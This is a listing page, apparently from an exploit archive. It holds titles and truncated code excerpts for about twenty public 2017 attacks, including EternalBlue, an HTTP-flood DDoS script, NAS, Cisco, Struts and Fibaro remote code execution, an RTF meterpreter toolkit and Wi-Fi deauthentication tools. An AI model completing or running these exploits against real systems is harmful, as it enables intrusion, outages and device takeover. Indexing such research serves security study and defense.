Run HTTP Flood DDoS Attacks: Wreckuests

Stress Testing: Run HTTP Flood DDoS Attacks Wreckuests is a script, which allows you to run DDoS attacks with HTTP-floodGET/POST. It’s written in pure Python and uses proxy-servers as “bots”. This script is published for educational purposes only! Features Cache bypass with random ?abcd=efg...

TerraMaster F2-420 NAS TOS 3.0.30 - Root Remote Code Execution

Source: https://www.evilsocket.net/2017/05/30/Terramaster-NAS-Unauthenticated-RCE-as-root/ !/usr/bin/python coding: utf8 Exploit: Unauthenticated RCE as root. Vendor: TerraMaster Product: TOS import sys import requests def upload address, port, filename, path = '/usr/www/' : url =...

DokuWiki Proof Of Concept Shell Upload

c@kali:/src/napalm2.2/modules$ cat shell-dokuwiki.py !/usr/bin/env python shell-dokuwiki.py - module to upload shell, based on previous version created 28.04.2017. Bug 'feature' is exploitable only when you will have a valid credentials. for this proof-of-concept you'll also need host with...

Apple MacOS NSUnarchiver Heap Corruption(CVE-2017-2523)

Via NSUnarchiver we can read NSBuiltinCharacterSet with a controlled serialized state. It reads a controlled int using decodeValueOfObjCType:"i" then either passes it to CFCharacterSetGetPredefined or uses it directly to manipulate NSBuiltinSetTable. Neither path has any bounds checking and the...

Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)

!/usr/bin/python from impacket import smb, ntlm from struct import pack import sys import socket ''' EternalBlue exploit for Windows 8 and 2012 by sleepya The exploit might FAIL and CRASH a target system depended on what is overwritten The exploit support only x64 target EDB Note: Shellcode - x64...

NETATTACK 2 - An Advanced Wireless Network Scan and Attack Script

NETATTACK 2 is a python script that scans and attacks local and wireless networks. Everything is super easy because of the GUI that makes it unnecessary to remember commands and parameters. FUNCTIONS SCAN-FUNCTIONS Scan for Wi-Fi networks Scan for local hosts in your network ATTACK-FUNCTIONS...

OpenVPN 2.4.0 - Denial of Service

OpenVPN 2.4.0 - Denial of Service !/usr/bin/env python3 ''' $ ./dosserver.py & $ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf ... Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from AFINET192.168.149.1:64249, sid=9a6c48a6 1467f5e1 Fri Feb 24 10:19:19 2017...

Dahua Generation 2/3 - Backdoor Access

!/usr/bin/python2.7 if False: ''' 2017-05-03 Public rerelease of Dahua Backdoor PoC https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py 2017-03-20 With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where...

HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation

HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation Source: https://www.securify.nl/advisory/SFY20170408/localprivilegeescalationvulnerabilityinhidemyassprovpnclientv3xformacos.html Abstract A local privilege escalation vulnerability has been found in the helper binary...

HideMyAss Pro VPN Client 3.3.0.3 Privilege Escalation Vulnerability

HideMyAss Pro VPN client version 3.3.0.3 for OS X suffers from a helper binary com.privax.hmaprovpn.helper local privilege escalation vulnerability. ------------------------------------------------------------------------ Local privilege escalation vulnerability in HideMyAss Pro VPN client v3.x f...

Weblate: Bypassing captcha in registration on Hosted site

Hello again, I believe the captcha on the user registration form is very simple and can be easily bypassed to automatically register any number of accounts. A program can read the math captcha, solve it and submit the form with the answer and the other required parameters & headers. Note: I read...

Squirrelmail 1.4.22 Remote Code Execution

Advisory ID: SGMA17-001 Title: Squirrelmail Remote Code Execution Product: Squirrelmail Version: 1.4.22 and probably prior Vendor: squirrelmail.org Type: Command Injection Risk level: 4 / 5 Credit: [email protected] CVE: CVE-2017-7692 Vendor notification: 2017-04-04 Vendor fix:...

Microsoft RTF Remote Code Execution

''' Exploit toolkit CVE-2017-0199 - v2.0 https://github.com/bhdresh/CVE-2017-0199 Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter payloa...

Exploit for CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 Exploit toolkit CVE-201...

Cisco Catalyst 2960 IOS 12.2(55)SE1 Remote Code Execution

!/usr/bin/python Author: Artem Kondratenko @artkond import socket import sys from time import sleep setcredless = True if lensys.argv 3: print sys.argv0 + ' host --set/--unset' sys.exit elif sys.argv2 == '--unset': setcredless = False elif sys.argv2 == '--set': pass else: print sys.argv0 + ' host...

netattack - Scan and Attack Wireless Networks

The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. The effectiveness and power of this script highly depends on your wireless card. USAGE EASY SCANNING FOR WIFI NETWORKS python netattack.py -scan -mon This example...

Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)

!/usr/bin/env python Exploit Title: DiskSorter Enterprise 9.5.12 - 'GET' Remote buffer overflow SEH Date: 2017-03-22 Exploit Author: Daniel Teixeira Author Homepage: www.danielteixeira.com Vendor Homepage: http://www.disksorter.com Software Link:...

Cobbler 2.8.0 - (Authenticated) Remote Code Execution

!/usr/bin/python """ Exploit title: Cobbler 2.8.x Authenticated RCE. Author: Dolev Farhi Contact: dolevf at protonmail.com @hack6tence Date: 03-16-2017 Vendor homepage: cobbler.github.io Software version: v.2.5.160805 Software Description ===================== Cobbler is a Linux installation serv...

Exploit for Improper Handling of Exceptional Conditions in Apache Struts

CVE-2017-5638 PoC Code in Python | DORK: ext:action Example Po...

Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation

!/usr/bin/python import requests import argparse import urllib import base64 import tarfile import os parser = argparse.ArgumentParserdescription='Fibaro RCE' parser.addargument'--rhost' parser.addargument'--lhost' parser.addargument'--lport' args = parser.parseargs f = open'run.sh', 'w'...